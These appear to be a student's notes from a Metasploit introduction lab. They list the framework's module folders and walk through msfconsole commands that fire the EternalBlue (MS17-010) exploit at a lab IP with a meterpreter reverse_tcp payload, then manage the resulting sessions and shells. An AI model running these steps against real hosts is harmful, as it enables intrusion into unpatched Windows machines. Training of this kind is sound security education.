Metasploit: Introduction
Summary
As we've seen, Metasploit is a strong tool for exploitation. The exploitation
method consists of three major steps: identifying the exploit, customizing the
exploit, and exploiting the vulnerable service.
Task 2: Main Components of Metasploit
Auxiliary modules can be found in:
/usr/share/metasploit-framework/modules/auxiliary/
Encoding modules can be found in
/usr/share/metasploit-framework/modules/encoders/
Metasploit: Introduction 1
� Evasion Modules can be found in
/usr/share/metasploit-framework/modules/evasion/
Exploitation modules can be found in
/usr/share/metasploit-framework/modules/exploits/
Metasploit: Introduction 2
� NOPs modules can be found in
/usr/share/metasploit-framework/modules/nops/
Payloads can be found in
/usr/share/metasploit-framework/modules/payloads/
Post modules can be found in
/usr/share/metasploit-framework/modules/post/
Metasploit: Introduction 3
� Task 3 - Msfconsole
In this task we will learn to set up a module to exploit MS17_101 eternal blue
vulnerability
[~] - hak101> msfconsole
msf6 > search MS17_010
Metasploit: Introduction 4
� We can select 0 because that the most common exploit
msf6 > use 0
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > Interrupt: use the 'exit' comm
Now we can use the show options command to check all the options
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Metasploit: Introduction 5
� Now we need to set RHOSTS and RPORT according to the victims machine and
the SMB port that we are attacking
and LHOST and LPORT should be our machines IP and port that we want to listen
in
msf6 exploit(windows/smb/ms17_010_eternalblue) > show payloads
This command lets use choose the type of payload to set for the exploit
If you want more info about the module use the info command
msf6 exploit(windows/smb/ms17_010_eternalblue) > info
Metasploit: Introduction 6
� Task 4 - Working with modules
In this module we will understand the different prompts are and how we can use
them
A normal terminal command prompt:
root@ip-10-10-XX-XX:~#
A msfconsole prompt:
msf6 >
A context prompt:
msf6 exploit(windows/smb/ms17_010_eternalblue) >
A shell on the target system:
C:\Windows\system32>
The Meterpreter prompt:
Metasploit: Introduction 7
� meterpreter >
Now our goal here is to get the meterpreter session using the eternal blue exploit
and explore options
We can set RHOSTS to the target IP
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.67.185
RHOSTS => 10.10.67.185
Using the show options command we can check further requirements
Now we can set out LHOST and LPORT to our IP and listening port
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.23.98.129
LHOST => 10.23.98.129
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
LPORT => 4444
msf6 exploit(windows/smb/ms17_010_eternalblue) >
Using the run command we can execute the exploit
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
Metasploit: Introduction 8
� And we get the meterpreter session connection
Now here are a few things we should learn, like backgrounding the session
meterpreter > background
Now to get back the session we can first see all the session
sessions -i
To connect back to the session
Metasploit: Introduction 9
� msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1
To drop into a shell
meterpreter > shell
Conclusion
Metasploit includes numerous modules that can be used for each stage of the
exploitation process. This room has shown us the fundamental components of
Metasploit and how they are used.
Metasploit: Introduction 10
